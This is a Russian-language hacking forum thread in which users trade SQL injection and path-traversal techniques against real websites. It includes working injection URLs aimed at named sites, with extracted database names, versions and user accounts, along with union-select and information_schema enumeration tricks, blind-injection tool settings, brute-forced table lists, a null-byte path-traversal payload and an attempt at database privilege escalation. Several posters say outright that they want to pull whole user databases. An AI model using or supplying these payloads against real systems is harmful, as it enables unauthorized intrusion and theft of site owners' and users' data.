Ваши вопросы по уязвимостям.

А какже префикс .php ?
И в phpBB папка /forum/images/avatars/ пуста, значит аватары скорее всего в БД = (

 

Ну в таком случае тебе не повезло.
А если все же в папке,то как то так: ../path_to_avata.gif%00

 

А точно в /images/avatars/ должны авы лежать?
Листинг каталогов открыт

 

спасибо mailbrush , вроде понятно, а как узнать что БД выводит только первое значение записи?
и вот еще такой пример инъекции нашел
?id=14+and+0+union+select+1,2,3,4,5,6,7,8
как ее понимать??

 

Если подобрал поля, но ни одно из них не выводится, вероятно всего - это именно тот случай. После подстановки "-", "and 1=0" все должно заработать.

 

есть скуля. получил имена таблиц. но они не работают. т.к. надо узнать имя БД. т.е. табла лежит в другой БД. как узнать имя БД?

 

concat_ws(0x3a,table_schema,table_name,column_name)

 

union select 1,2,database(),4,5
3 - выводимая колонка.

 

Code:

Если через тулзу:

http://www.akos-icco.ru/news.php?part=1+or+1=1+and+substring(version(),1,1)=4--+

database(): w_akos
version(): 4.1.20-1.gms
@@version_compile_os: pc-linux-gnu
user(): [email protected]

Post-метод, настройки:

$bl_url = "http://www.akos-icco.ru/news.php?part=1+or+1=1"; 
$bl_filtr = "--+";
$bl_plus = "+"; 
$bl_error = "8 декабря 2008";
$bl_error_type = 1; 

Скрипт сохранить в ANSI-формате

   Brute tables
   -------------
  members
  subscribe
  news
  articles

Дальше сам

 

В поис вставляем галочку site/list.aspx?q=' Получаем:

Server Error in '/' Application.
Invalid operator for data type. Operator equals modulo, type equals varchar.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Invalid operator for data type. Operator equals modulo, type equals varchar.

Source Error:

Line 94: paramCollection.Add(new SqlParameter("@Keywords", keywords));
Line 95: paramCollection.Add(new SqlParameter("@StatusId", statusId));
Line 96: DataTable dt = Sql.ExecuteQuery("dt", "spCourse_Search", paramCollection);
Line 97: return dt;
Line 98: }


Source File: d:\websites\LocalUser\modernsalonlearningc\App_Code\Course.cs Line: 96

Stack Trace:
Дальше лабудень непонятная. Это что значит? уязвимость? Можно базу собрать? Просто с sql не знаком, если скажете что можно - буду читать, учить, пробовать. Очень база с сайта нужна.

 

Ошибка в типах. Это не инъекция

 

При таком запросе ты узнаешь текущую версию БД, а челу надо узнать БД, в которой находится таблица. Делается это так:

Code:

SELECT table_schema FROM information_schema.tables WHERE table_name = 'твоя_таблица'

Если кавычки экранируются, переводи либо в HEX либо в CHAR.

 

Здравствуйте.
Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
М что означает

?
Спасибо.

 

Да это sql-injection в SQL операторе LIMIT

 

для mff:
http://www.etiket-shop.ru/pages.php?Page=65&nID=-132'+union+select+1,2,3,@@version,5--+

 

Limit стоит после order by. Потому если file_priv N, то ничего не сделаешь. Второй вариант, как уже описали выше, найти другую скулю

что-то я обкурился

 

Спасибо ребят! Как бы теперь узнать табличку в юзерами? Нужно базу потянуть

 

версия Mysql ниже 5, а точней 4.0.26-log
Вариант перебор таблиц и полей!

 

Alf0x0ns, ага, уже перебирал. Может кто словариком задобрит?

 

Как повысить привилегии юзера в бд?
Например, есть юзер с ником user, PRIVILEGE_TYPE: USAGE.
Как добавить привилегии, пробивал через инсерт:

Code:

INSERT INTO 'USER_PRIVILEGES' VALUES('tracker'@'localhost',null,UPDATE,YES);

Подскажите где ошибка в синтаксисе?

спасибо v1d0qz.